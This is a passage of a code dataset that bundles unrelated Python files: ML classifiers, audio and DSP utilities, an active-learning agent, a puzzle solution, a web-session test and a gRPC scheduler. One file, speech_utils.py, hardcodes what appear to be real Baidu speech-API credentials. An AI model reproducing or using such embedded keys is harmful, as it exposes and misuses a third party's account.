y\n\nclass MLP_model(nn.Module):\n def __init__(self, n_features, n_hidden_units, dropout):\n super(MLP_model, self).__init__()\n self.mlp = nn.Sequential(\n nn.Linear(n_features, n_hidden_units),\n nn.Dropout(dropout),\n nn.Linear(n_hidden_units, n_hidden_units),\n nn.Dropout(dropout),\n nn.Linear(n_hidden_units, 1),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n out = self.mlp(x)\n return out\n\n\nclass Classifier_MLP(supervised_classifier.Supervised_Classifier):\n def __init__(self,\n dataset,\n type_prediction : {'head', 'tail'},\n results_dir,\n embedding_model : Embedding_Model,\n hyper_params = None,\n model_path = None):\n if hyper_params is None:\n hyper_params = { \"n_units\" : 100, \"dropout\" : 0.2}\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n super(Classifier_MLP, self).__init__(dataset, type_prediction, results_dir,\n embedding_model, hyper_params, model_path)\n if model_path is not None:\n self.get_model().eval()\n\n def init_model(self, embedding_model, hyper_params):\n n_units = hyper_params['n_units']\n dropout = hyper_params['dropout']\n n_features = embedding_model.get_size_embedding_entity() * 2 + embedding_model.get_size_embedding_relation()\n self.set_model(MLP_model(n_features, n_units, dropout).to(self.device))\n\n def get_name(self):\n return \"MLP\"\n\n def create_training_data(self, queries_with_annotated_answers):\n out = []\n for query in tqdm(queries_with_annotated_answers):\n assert(query['query']['type'] == 1 or self.type_prediction == 'head')\n assert (query['query']['type'] == 0 or self.type_prediction == 'tail')\n ent = query['query']['ent']\n rel = query['query']['rel']\n emb_e = self.embedding_model.get_embedding_entity(ent)\n emb_r = self.embedding_model.get_embedding_relation(rel)\n for answer in query['annotated_answers']:\n a = answer['entity_id']\n emb_a = self.embedding_model.get_embedding_entity(a)\n data_entry = {}\n #X\n if self.type_prediction == 'head':\n X = np.concatenate([emb_a, emb_r, emb_e])\n else:\n X = np.concatenate([emb_e, emb_r, emb_a])\n #Y\n if answer['checked']:\n Y = 1\n else:\n Y = 0\n data_entry['X'] = X\n data_entry['Y'] = Y\n out.append(data_entry)\n return out\n\n def train(self, training_data, valid_data, model_path, batch_size=100, epochs=10):\n # Load input data\n self.get_model().train()\n training_data_set = MLP_Dataset(training_data)\n train_data_loader = DataLoader(training_data_set, batch_size=batch_size, shuffle=True)\n\n criterion = nn.BCELoss()\n optimizer = optim.Adam(self.get_model().parameters())\n for epoch in range(epochs): # loop over the dataset multiple times\n print(\"Start epoch {}\".format(epoch))\n running_loss = 0.0\n for i, data in enumerate(train_data_loader, 0):\n inputs, labels = data\n inputs.to(self.device)\n labels.to(self.device)\n optimizer.zero_grad()\n outputs = self.get_model()(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n # print statistics\n running_loss += loss.item()\n if i % 2000 == 1999: # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 2000))\n running_loss = 0.0\n # TODO: Test the performance on the valid dataset\n\n # Save model\n self.save_model(model_path)\n\n def predict(self, query_with_answers, type_answers):\n ent = query_with_answers['ent']\n rel = query_with_answers['rel']\n typ = query_with_answers['type']\n assert (typ == 1 or self.type_prediction == 'head')\n assert (typ == 0 or self.type_prediction == 'tail')\n emb_e = 
self.embedding_model.get_embedding_entity(ent)\n emb_r = self.embedding_model.get_embedding_relation(rel)\n annotated_answers = []\n for answer in query_with_answers[type_answers]:\n # Construct the input features for the model\n emb_a = self.embedding_model.get_embedding_entity(answer)\n if self.type_prediction == 'head':\n X = np.concatenate([emb_a, emb_r, emb_e])\n else:\n X = np.concatenate([emb_e, emb_r, emb_a])\n # Do the prediction\n out = self.get_model()(torch.Tensor(X))\n score = out.item()\n checked = score > 0.5\n annotated_answers.append({'entity_id' : answer, 'checked' : checked, 'score': score})\n return annotated_answers","repo_name":"karmaresearch/duel","sub_path":"code/classifier_mlp.py","file_name":"classifier_mlp.py","file_ext":"py","file_size_in_byte":6033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"19248387274","text":"# !/usr/bin/env python3\n\nimport wave\nimport pyaudio\nfrom pyaudio import PyAudio, paInt16\nfrom aip import AipSpeech\nimport io, os, subprocess, wave\nimport io\n\n\nCUID = '93489083242'\nDEV_PID = 1537\n\ndef audio_record_rt(rec_time):\n CHUNK = 1024\n FORMAT = pyaudio.paInt16 # 16-bit encoding format\n CHANNELS = 1 # mono\n RATE = 16000 # 16000 Hz sampling rate\n p = pyaudio.PyAudio()\n # Create the audio stream\n stream = p.open(format=FORMAT, # wav audio stream format\n channels=CHANNELS, # mono\n rate=RATE, # sampling rate 16000\n input=True,\n frames_per_buffer=CHUNK)\n print(\"Start Recording...\")\n frames = [] # recorded audio frames\n # Record the audio data\n for i in range(0, int(RATE / CHUNK * rec_time)):\n data = stream.read(CHUNK)\n frames.append(data)\n # Recording finished\n stream.stop_stream()\n stream.close()\n p.terminate()\n print(\"Recording Done...\")\n # Save the audio file\n with io.BytesIO() as wav_file:\n wf = wave.open(wav_file, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n wav_data = wav_file.getvalue()\n return wav_data\n\ndef shutil_which(pgm):\n \"\"\"\n python2 backport of python3's shutil.which()\n \"\"\"\n path = os.getenv('PATH')\n for p in path.split(os.path.pathsep):\n p = os.path.join(p, pgm)\n if os.path.exists(p) and os.access(p, os.X_OK):\n return p\n\ndef play_mp3(mp3_data):\n import platform, os, stat\n # determine which player executable to use\n system = platform.system()\n path = os.path.dirname(os.path.abspath(\n __file__)) # directory of the current module file, where all the FLAC bundled binaries are stored\n player = shutil_which(\"mpg123\") # check for installed version first\n if player is None: # flac utility is not installed\n if system == \"Windows\" and platform.machine() in [\"i386\", \"x86\", \"x86_64\",\n \"AMD64\"]: # Windows NT, use the bundled FLAC conversion utility\n player = os.path.join(path, \"player\", \"mpg123-win32.exe\")\n elif system == \"Linux\" and platform.machine() in [\"i386\", \"x86\", \"x86_64\", \"AMD64\"]:\n player = os.path.join(path, \"player\", \"mpg123-linux\")\n elif system == 'Darwin' and platform.machine() in [\"i386\", \"x86\", \"x86_64\", \"AMD64\"]:\n player = os.path.join(path, \"player\", \"mpg123-mac\")\n else:\n raise OSError(\n \"MP3 player utility not available - consider installing the MPG123 command line application using `brew install mpg123` or your operating system's equivalent\")\n\n try:\n stat_info = os.stat(player)\n os.chmod(player, stat_info.st_mode | stat.S_IEXEC)\n except OSError:\n pass\n\n process = subprocess.Popen(\"\\\"%s\\\" -q -\" % player, stdin=subprocess.PIPE, stdout=subprocess.PIPE, 
shell=True)\n play_info, stderr = process.communicate(mp3_data)\n return play_info\n\nsp_client = AipSpeech('14922410', 'NSChZHWWVwa1BSwZ36Oaya4C', '1dd0sxs2LXYRWETZ4gZSSDYDQvM6aROv')","repo_name":"konghaoshen/CustomerServiceAI","sub_path":"asr/speech_utils.py","file_name":"speech_utils.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"33413647521","text":"import urllib, re\nfrom xml.dom import minidom\nimport Media, AudioFiles\n\nVirtual = True\n\ndef Scan(path, files, mediaList, subdirs, language=None):\n if len(path) == 0:\n # Top level, albums.\n dom = minidom.parse(urllib.urlopen('http://127.0.0.1:32400/music/iTunes/Albums'))\n for album in sorted(dom.getElementsByTagName('Album'), key=lambda album: album.getAttribute('artist').lower() + album.getAttribute('album').lower()):\n subdirs.append('/' + album.getAttribute('key'))\n else:\n # Tracks.\n paths = path.split('/')\n dom = minidom.parse(urllib.urlopen('http://127.0.0.1:32400/music/iTunes/Albums/%s' % paths[0]))\n artist_album_map = {}\n compilation_count = 0\n for track in dom.getElementsByTagName('Track'):\n # Figure out album artist.\n album_artist = track.getAttribute('albumArtist').strip()\n artist_album_map[album_artist] = True\n if len(album_artist) == 0: album_artist = None\n else: album_artist = album_artist.encode('utf-8')\n \n # Track index, do a bit of extra work.\n index = int(track.getAttribute('index'))\n file = track.getAttribute('file').split('/')[-1]\n if index == 0:\n try: index = int(re.findall('[.\\-]+[ ]*([0-9]{2})[ ]*[.\\-]', file)[0])\n except: \n try: index = int(re.findall('^([0-9]{2})[ .\\-]', file)[0])\n except: pass\n \n # Add the track.\n t = Media.Track(artist = track.getAttribute('artist').encode('utf-8'),\n album = track.getAttribute('album').encode('utf-8'),\n title = track.getAttribute('track').encode('utf-8'),\n index = index,\n album_artist = album_artist,\n disc = int(track.getAttribute('disc')))\n if track.getAttribute('compilation') == '1': compilation_count = compilation_count + 1\n t.parts.append(urllib.unquote(track.getAttribute('file')).encode('utf-8'))\n mediaList.append(t)\n \n # If we're listed as a compilation, make sure all album artists are there and the same.\n if compilation_count > 0 and (len(artist_album_map) > 1 or len(artist_album_map.keys()[0]) == 0):\n for t in mediaList:\n t.album_artist = 'Various Artists'\n","repo_name":"jbartfield/Scanners.bundle","sub_path":"Contents/Resources/Music/Plex iTunes Scanner.py","file_name":"Plex iTunes Scanner.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"35211127106","text":"import torch\nimport math\nimport matplotlib.pyplot as plt\n\ndef mod_sigmoid(x):\n return 2 * torch.sigmoid(x)**(math.log(10)) + 1e-7\n\ndef safe_log(x, eps=1e-7):\n return torch.log(x + eps)\n\n###################\n# Noise Filtering - Follows the same approach as the DDSP repo\n# https://github.com/magenta/ddsp/blob/main/ddsp/synths.py#L181\n# Takes fourier domain filter coefficients and a filter window and returns filtered uniform noise\n# - Calculate parameters, N, num_samples\n# - Invert filter coefficients from fourier domain -> time domain\n# - Apply windowing by multiplying time domain filter coefficients by filter (FFT, Hann etc) window\n# - Apply FFT shift on filter coefficient in time domain\n# - Create noise signal from uniform noise\n# - Transform noise signal and windowed filter coefficients into fourier domain\n# - Convolve the signal, by multiplying them in the fourier domain\n# - Perform inverse fourier transform of new signal to get audio signal\ndef noise_filtering(filter_coeffs,filter_window):\n N = filter_coeffs.shape[0]\n # get number of samples based on number of freq bins\n num_samples = (filter_coeffs.shape[1]-1)*2\n dtype = filter_coeffs.dtype\n # create impulse response\n # torch.complex is not implemented on MPS, use CPU\n filter_coeffs = torch.complex(filter_coeffs,torch.zeros_like(filter_coeffs))\n # Inverting filter coefficients from fourier domain --> time domain for windowing\n filter_ir = torch.fft.irfft(filter_coeffs)\n # Apply windowing\n filter_ir = filter_ir*filter_window.unsqueeze(0).repeat(N,1)\n # ir = filter_ir[0].detach().cpu().numpy()\n # plt.plot(ir)\n # plt.savefig(\"windowed_impulse_response.png\")\n\n # Apply fft shift \n # Question - Why are we doing this and what is it doing, can see that it is done in DDSP\n \n filter_ir = torch.fft.fftshift(filter_ir,dim=-1)\n # convolve with noise signal\n # Create noise, why do we multiply by 2 and subtract 1 here\n noise = torch.rand(N, num_samples, dtype=dtype, device=filter_coeffs.device)*2-1\n # Transform noise and impulse response filters into fourier domain\n S_noise = torch.fft.rfft(noise,dim=1)\n S_filter = torch.fft.rfft(filter_ir,dim=1)\n # Conv (multiply in fourier domain)\n S = torch.mul(S_noise,S_filter)\n # Invert back into time domain to get audio\n audio = torch.fft.irfft(S)\n\n # Note that overlap-add is used here in DDSP, \n # but this is because they are using a bunch of audio frames\n # do they do something similar in Neural Gran Synth\n\n return audio","repo_name":"aaron-dees/neuralGranularSynthesis","sub_path":"utils/dsp_components.py","file_name":"dsp_components.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"22556006058","text":"import logging\nimport random\nfrom random import sample\nfrom typing import List, Dict, NoReturn\nimport os, sys\nimport numpy as np\nimport pandas as pd\nimport json\nfrom torch.utils import data\nimport torch\nfrom torch.utils.data import BatchSampler, SubsetRandomSampler\nfrom tqdm import tqdm\n\nfrom .util_classes import RenovationError\nfrom .data_utils import command_line\n\nTQDM_MODE = True\n\n\nclass AgentBase:\n def __init__(\n self, train_set, batch_size, selector_class, model, device, budget\n ):\n self.batch_size = batch_size\n self.train_set = train_set\n self.selector = selector_class\n self.selector.assign_agent(self)\n self.model = model\n self.device = device\n\n self.budget = budget\n self.initial_budget = self.budget\n\n self.unlabelled_set = None\n self.labelled_set = None\n self.num = 0\n self.round_all_word_scores = {}\n\n def init(self, init_cost_prop, seed=42):\n print(\"starting random init\")\n self.random_init(init_cost_prop, seed)\n self.update_datasets()\n print(\"finished random init\")\n\n def step(self, update_dataset=True):\n print('step')\n if update_dataset:\n self.update_dataset_attributes()\n self.update_index()\n self.update_datasets()\n\n def budget_spent(self):\n return self.initial_budget - self.budget\n\n def num_instances(self):\n return sum([len(l) for l in self.labelled_set])\n\n def save(self, save_path):\n self.train_set.index.save(save_path)\n self.selector.save(save_path)\n with open(os.path.join(save_path, \"all_word_scores_no_nan.json\"), \"w\") as f:\n 
json.dump(self.round_all_word_scores, f)\n raise RenovationError('This is original project specific')\n\n def random_init(self, init_cost_prop, seed):\n \"\"\"\n Randomly initialise self.labelled_idx dictionary\n \"\"\"\n\n # Randomly order the datapoints in the dataset using a seed\n init_sampler = random.Random(seed)\n randomly_ordered_indices = sorted(range(len(self.train_set)), key=lambda k: init_sampler.random())\n\n # Use dataset property:\n init_cost = self.train_set.total_cost * init_cost_prop\n\n # Go through random order, stop when cost hit\n budget_spent = 0\n for i in randomly_ordered_indices:\n self.train_set.index.label_instance(i)\n budget_spent += self.train_set.get_cost_by_index(i)\n if budget_spent > init_cost:\n break\n\n # 'Global' cost budget variable\n self.budget -= budget_spent\n\n print(f\"total dataset cost: {self.train_set.total_cost}\")\n print(f\"initialised with {budget_spent} cost | remaining cost budget: {self.budget}\")\n\n def __iter__(self):\n return self\n\n def __next__(self):\n num = self.num\n self.num += 1\n if num < 0:\n raise StopIteration\n if num > 0:\n self.step()\n if self.budget <= 0:\n self.num = -1\n return self.budget\n\n def update_datasets(self):\n unlabelled_instances = set()\n labelled_instances = set()\n\n print(\"update datasets\")\n for i in tqdm(range(len(self.train_set)), disable=not TQDM_MODE):\n if self.train_set.index.is_partially_unlabelled(i):\n unlabelled_instances.add(i)\n if self.train_set.index.has_any_labels(i):\n labelled_instances.add(i)\n\n self.unlabelled_set = list(\n BatchSampler(\n SubsetRandomSampler(list(unlabelled_instances)),\n self.batch_size,\n drop_last=False,\n )\n )\n\n self.labelled_set = list(\n BatchSampler(\n SubsetRandomSampler(list(labelled_instances)),\n self.batch_size,\n drop_last=False,\n )\n )\n\n def update_dataset_attributes(self):\n \"\"\"\n Score unlabelled instances in terms of their suitability to be labelled next.\n Add the highest scoring instance indices in the dataset to self.labelled_idx\n \"\"\"\n\n if self.budget <= 0:\n logging.warning(\"no more budget left!\")\n\n with torch.no_grad():\n # print('get sentence scores')\n for batch_indices in tqdm(\n self.unlabelled_set + self.labelled_set, disable=not TQDM_MODE\n ):\n instances, _, lengths, _ = self.train_set.get_batch(batch_indices, labels_important=False)\n try:\n model_attrs = self.model(instances.to(self.device))\n except:\n model_attrs = self.model(instances)\n model_attrs = {k: v.detach() if isinstance(v, torch.Tensor) else v for k, v in model_attrs.items()}\n self.train_set.update_attributes(batch_indices, model_attrs, lengths)\n\n def update_index(self):\n\n all_windows = []\n for labelled_batch_indices in tqdm(self.labelled_set, disable=not TQDM_MODE):\n windows = self.selector.window_generation(labelled_batch_indices, self.train_set)\n all_windows.extend(windows)\n for unlabelled_batch_indices in tqdm(self.unlabelled_set, disable=not TQDM_MODE):\n windows = self.selector.window_generation(unlabelled_batch_indices, self.train_set)\n all_windows.extend(windows)\n\n all_windows.sort(key=lambda e: e.score, reverse=True)\n best_windows, budget_spent = self.selector.select_best(all_windows)\n self.budget -= budget_spent\n if self.budget < 0:\n logging.warning(\"no more budget left!\")\n\n total_cost = 0\n for window in best_windows:\n total_cost += window.cost\n self.train_set.index.label_window(window)\n\n # No more windows of this size left\n if total_cost < self.selector.round_cost:\n 
self.selector.reduce_window_size()\n\n\nclass ActiveLearningAgent(AgentBase):\n def __init__(self, train_set, batch_size, selector_class, model, device, budget):\n # ADD AN EXCEPTION FOR THE WRONG TYPE OF SELECTOR HERE\n super(ActiveLearningAgent, self).__init__(train_set, batch_size, selector_class, model, device, budget)\n\n\nclass SubsetSelectionAgent(AgentBase):\n def __init__(self, train_set, batch_size, selector_class, model, device, budget):\n super(SubsetSelectionAgent, self).__init__(train_set, batch_size, selector_class, model, device, budget)\n\n\nclass KaldiAgent(AgentBase):\n def __init__(self, train_set, batch_size, selector_class, model, device, namer, budget, suffix, call_path=True):\n super(KaldiAgent, self).__init__(train_set, batch_size, selector_class, model, device, budget)\n if call_path:\n command_line('bash path.sh')\n self.namer = namer\n self.suffix = suffix\n\n def init(self, init_parts_path):\n print(f'Initialising agent from {init_parts_path}')\n with open(init_parts_path, \"r\") as f:\n lines = f.read()[:-1].split('\\n')\n lines = [l.rstrip() for l in lines]\n previously_selected_indices = []\n\n # TEMPORARY FIX - THIS CAN BE MADE QUICKER UNDER A PERMANENT BY PARTS ASSUMPTION\n utt_ids = {}\n [utt_ids.update({u: (j, k) for k, u in enumerate(self.train_set.utt_ids[j])}) for j in range(len(self.train_set))]\n utt_idxs = []\n for line in lines:\n idxs = utt_ids.get(line)\n if idxs:\n a, b = idxs\n previously_selected_indices.append(a)\n utt_idxs.append(b)\n budget_previously_spent = 0\n for i, j in enumerate(previously_selected_indices):\n self.train_set.index.label_instance(j)\n # Fix this when things are resolved\n budget_previously_spent += self.train_set.cost[j][utt_idxs[i]]\n\n # self.budget -= budget_previously_spent\n print(f'Finished initialising agent with {budget_previously_spent} data, NOT included in {self.budget} budget')\n\n self.update_datasets(write_to_file = False)\n\n def step(self, update_dataset=True):\n self.namer.update_paths(self.suffix)\n return super().step(update_dataset=update_dataset)\n\n def random_init(self, num_instances, seed):\n raise NotImplementedError(\"Random init not implemented for KaldiAgent, init requires a utterance list file\")\n\n def update_datasets(self, write_to_file = True):\n\n unlabelled_instances = set()\n labelled_instances = set()\n\n print(\"update datasets\")\n for i in tqdm(range(len(self.train_set)), disable=not TQDM_MODE):\n if self.train_set.index.is_partially_unlabelled(i):\n unlabelled_instances.add(i)\n if self.train_set.index.has_any_labels(i):\n labelled_instances.add(i)\n\n self.unlabelled_set = list(\n BatchSampler(\n SubsetRandomSampler(list(unlabelled_instances)),\n self.batch_size,\n drop_last=False,\n )\n )\n\n self.labelled_set = list(\n BatchSampler(\n SubsetRandomSampler(list(labelled_instances)),\n self.batch_size,\n drop_last=False,\n )\n )\n\n if write_to_file:\n\n with open(self.namer.current_paths['labelled_utts'], 'w') as f:\n # is sorting an issue? Kaldi might have a case for this\n # MAKE SURE THIS DOES AFFECT LABELLED_SET\n for group_index in labelled_instances:\n group = self.train_set.utt_ids[group_index]\n labelled_utt_ids = [g for i, g in enumerate(group) if i in self.train_set.index.labelled_idx[group_index]]\n for utt_id in labelled_utt_ids:\n f.write(utt_id)\n f.write('\\n')\n\n with open(self.namer.current_paths['unlabelled_utts'], 'w') as f:\n # is sorting an issue? 
Kaldi might have a case for this\n for group_index in unlabelled_instances:\n group = self.train_set.utt_ids[group_index]\n unlabelled_utt_ids = [g for i, g in enumerate(group) if i in self.train_set.index.unlabelled_idx[group_index]]\n for utt_id in unlabelled_utt_ids:\n f.write(utt_id)\n f.write('\\n')\n\n clustersize = 30\n\n for feature_name in self.namer.feature_names:\n break\n self.prepare_feat_subset(feature_name)\n combined_feature_name = self.combine_feat_subset(feature_name)\n self.compute_cmvn(combined_feature_name)\n self.split_data_dir(combined_feature_name, clustersize)\n self.split_data_dir(feature_name, clustersize)\n\n\nclass AutomaticKaldiNameIncrementer:\n\n def __init__(self, model_run_dir:str, data_run_dir:str, log_run_dir:str, base_model_paths:dict, base_data_paths:dict, base_log_paths:dict, constant_paths:dict, feature_names:list, make=True):\n self.model_run_dir, self.data_run_dir, self.log_run_dir = model_run_dir, data_run_dir, log_run_dir\n self.previous_paths = {}\n self.previous_paths.update({k: os.path.join(model_run_dir, v.split('/')[-1]) for k, v in base_model_paths.items()})\n self.previous_paths.update({k: os.path.join(data_run_dir, v.split('/')[-1]) for k, v in base_data_paths.items()})\n self.previous_paths.update({k: os.path.join(data_run_dir, v.split('/')[-1]) for k, v in base_log_paths.items()})\n\n if make:\n\n for dir in [data_run_dir, model_run_dir, log_run_dir]:\n try:\n os.mkdir(dir)\n except FileExistsError:\n non_symb = [f for f in os.listdir(dir) if not os.path.islink(os.path.join(dir, f))]\n if len(non_symb) == 0:\n print(f\"{dir} exists but only has symbolic links, ignoring error\")\n else:\n raise FileExistsError()\n\n for file_path in base_model_paths.values():\n sym_path = os.path.join(model_run_dir, file_path.split('/')[-1])\n try:\n os.symlink(file_path, sym_path)\n except FileExistsError:\n assert os.readlink(sym_path) == file_path\n\n for file_path in base_data_paths.values():\n sym_path = os.path.join(data_run_dir, file_path.split('/')[-1])\n try:\n os.symlink(file_path, sym_path)\n except FileExistsError:\n assert os.readlink(sym_path) == file_path\n\n for file_path in base_log_paths.values():\n sym_path = os.path.join(log_run_dir, file_path.split('/')[-1])\n try:\n os.symlink(file_path, sym_path)\n except FileExistsError:\n assert os.readlink(sym_path) == file_path\n\n self.current_paths = self.previous_paths.copy()\n self.constant_paths = constant_paths\n self.feature_names = feature_names\n\n def update_paths(self, suffix):\n self.previous_paths = self.current_paths\n self.current_paths = {k: v+suffix for k, v in self.previous_paths.items()}\n","repo_name":"puria-radmard/iib_project","sub_path":"active_learning/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":13376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16381936732","text":"#!/bin/python3\n\nfrom ast import literal_eval\n\n\ndef compareLists(a, b):\n # print(\"Comparing \" + str(a) + \" vs \" + str(b))\n useLen = max(len(a), len(b))\n\n for i in range(useLen):\n if i >= len(a):\n return True\n if i >= len(b):\n return False\n\n if isinstance(a[i], int) and isinstance(b[i], int):\n if a[i] > b[i]:\n return False\n if a[i] < b[i]:\n return True\n elif isinstance(a[i], list) and isinstance(b[i], list):\n retval = compareLists(a[i], b[i])\n if retval is not None:\n return retval\n elif isinstance(a[i], int) and isinstance(b[i], list):\n tmpVal = a[i]\n a[i] = []\n a[i].append(tmpVal)\n retval 
= compareLists(a[i], b[i])\n if retval is not None:\n return retval\n elif isinstance(a[i], list) and isinstance(b[i], int):\n tmpVal = b[i]\n b[i] = []\n b[i].append(tmpVal)\n retval = compareLists(a[i], b[i])\n if retval is not None:\n return retval\n\n\nfile = open(\"input\", \"r\")\ninput = file.readlines()\nfile.close()\n\npairs = []\ncorrectCounter = 0\n\nfor line in input:\n if line != \"\\n\":\n pairs.append(literal_eval(line.strip()))\n\ntmpCounter = 1\nlocPairs = pairs.copy()\nfor i in range(0, len(pairs), 2):\n compareResult = compareLists(locPairs[i], locPairs[i+1])\n # print(str(tmpCounter) + \": \" + str(compareResult))\n if(compareResult):\n correctCounter += tmpCounter\n tmpCounter += 1\n\nprint(correctCounter)\n\n\n# Part 2\ndef bubbleSort(pairs):\n for i in range(len(pairs)-1):\n for j in range(0, len(pairs)-i-1):\n if compareLists(pairs[j+1], pairs[j]):\n pairs[j], pairs[j+1] = pairs[j+1], pairs[j]\n\n\nstrList = []\nresolution = [-1, -1]\npairs += [[2]]\npairs += [[6]]\nbubbleSort(pairs)\n\nfor (i, line) in enumerate(pairs):\n print(line)\n if line == [[[[2]]]]:\n resolution[0] = i+1\n elif line == [[[[6]]]]:\n resolution[1] = i+1\n\nprint(resolution[0] * resolution[1])\n","repo_name":"benjamin-zastrow/AdventOfCode2022","sub_path":"13/packets.py","file_name":"packets.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33905029818","text":"import pytest\n\nfrom weppy.testing.env import EnvironBuilder\nfrom weppy.sessions import SessionManager\n\n\n@pytest.fixture(scope='module')\ndef current():\n from weppy.globals import current\n builder = EnvironBuilder()\n current.initialize(builder.get_environ())\n return current\n\n\ndef test_session_cookie(current):\n session_cookie = SessionManager.cookies(\n key='sid',\n secure=True,\n domain='localhost',\n cookie_name='foo_session'\n )\n assert session_cookie.key == 'sid'\n assert session_cookie.secure is True\n assert session_cookie.domain == 'localhost'\n\n session_cookie.open()\n assert current.session._expiration == 3600\n\n session_cookie.close()\n cookie = str(current.response.cookies)\n assert 'foo_session' in cookie\n assert 'Domain=localhost;' in cookie\n assert 'secure' in cookie.lower()\n\n current.request.cookies = current.response.cookies\n session_cookie.open()\n assert current.session._expiration == 3600\n","repo_name":"feitianyiren/weppy","sub_path":"tests/test_session.py","file_name":"test_session.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"42726788043","text":"import os\nimport random\nimport threading\nimport logging\nfrom pathlib import Path\nfrom concurrent.futures import ThreadPoolExecutor\nimport grpc\nfrom grpc import StatusCode\n\nfrom scheduler import ledger\nfrom scheduler.event import Event\nfrom scheduler.auth import Auth, AuthException\nfrom scheduler.utils import unix_time, uuid, open_db\n\nfrom capsule import common_pb2 as co\n\nfrom capsule import scheduler_pb2 as sc\nfrom capsule.scheduler_pb2_grpc import (\n SchedulerServicer,\n add_SchedulerServicer_to_server,\n)\n\nfrom capsule import worker_pb2 as wo\nfrom capsule.worker_pb2_grpc import WorkerStub\n\n\ndef requires_token(f):\n \"\"\"Decorator that checks token in request metadata and puts an openid in context.\"\"\"\n\n def _get_metadata(context):\n return dict(context.invocation_metadata())\n\n def inner(self, request, context):\n 
metadata = _get_metadata(context)\n if \"token\" not in metadata:\n context.abort(StatusCode.UNAUTHENTICATED, \"Auth token needed\")\n token = metadata[\"token\"]\n try:\n context.openid = self.auth.get_openid(token)\n except AuthException:\n context.abort(StatusCode.UNAUTHENTICATED, \"Bad token\")\n return f(self, request, context)\n\n return inner\n\n\ndef log_request(f):\n def inner(self, request, context):\n logging.info(f'{f.__name__}\\n{request}')\n return f(self, request, context)\n\n return inner\n\n\nclass MyScheduler(SchedulerServicer):\n def __init__(self, auth, task_event, db_fn):\n self.auth = auth\n self.task_event = task_event\n self.db_fn = db_fn\n self.workers = set()\n\n def worker_stub(self):\n if not self.workers:\n raise Exception('No worker available')\n endpoint = random.choice(list(self.workers))\n return WorkerStub(grpc.insecure_channel(endpoint))\n\n @log_request\n def TryLogin(self, request, context):\n token = request.token\n\n try:\n if self.auth.request_login(token):\n return co.Empty()\n else:\n context.abort(StatusCode.DEADLINE_EXCEEDED, \"Confirmation timeout\")\n except AuthException:\n context.abort(StatusCode.INVALID_ARGUMENT, \"Token is in use\")\n\n @log_request\n def ConfirmLogin(self, request, context):\n token = request.token\n openid = request.openid\n username = request.name\n\n try:\n self.auth.confirm_login(token, openid)\n except AuthException:\n context.abort(StatusCode.INVALID_ARGUMENT, \"Non-existing token\")\n\n with self.db_fn() as db:\n cnt = db.execute(\n \"SELECT COUNT(*) FROM users WHERE users.openid = ?\", (openid,)\n ).fetchone()[0]\n if cnt == 0:\n logging.info(f\"Creating new user: username={username}, openid={openid}\")\n db.execute(\"INSERT INTO users VALUES (?,?)\", (openid, username))\n return co.Empty()\n\n @requires_token\n @log_request\n def GetUserData(self, request, context):\n openid = context.openid\n\n with self.db_fn() as db:\n username = db.execute(\n \"SELECT name FROM users WHERE openid = ?\", (openid,)\n ).fetchone()[\"name\"]\n\n articles = []\n for row in db.execute(\n \"SELECT id, title, created_at FROM articles WHERE articles.user = ?\",\n (openid,),\n ):\n cnt = db.execute(\n \"SELECT COUNT(*) FROM snapshots WHERE snapshots.article = ?\",\n (row[\"id\"],),\n ).fetchone()[0]\n articles.append(\n co.Article(\n id=row[\"id\"],\n title=row[\"title\"],\n created_at=row[\"created_at\"],\n snapshot_count=cnt,\n )\n )\n\n notifications = []\n for r in db.execute(\n \"SELECT id, created_at, has_read, content, type FROM notifications WHERE user = ? ORDER BY created_at DESC\",\n (openid,),\n ):\n notifications.append(\n co.Notification(\n id=r[\"id\"],\n created_at=r[\"created_at\"],\n has_read=r[\"has_read\"],\n content=r[\"content\"],\n type=r[\"type\"],\n )\n )\n r = co.UserData(\n username=username, articles=articles, notifications=notifications\n )\n return r\n\n @requires_token\n @log_request\n def CreateArticle(self, request, context):\n openid = context.openid\n title = request.title\n\n _id = uuid()\n timestamp = unix_time()\n with self.db_fn() as db:\n db.execute(\n \"INSERT INTO articles VALUES (?,?,?,?)\", (_id, openid, timestamp, title)\n )\n return co.Article(id=_id, title=title, created_at=timestamp)\n\n @requires_token\n @log_request\n def DeleteArticle(self, request, context):\n openid = context.openid\n article_id = request.article_id\n\n with self.db_fn() as db:\n db.execute(\n \"DELETE FROM articles WHERE articles.id = ? 
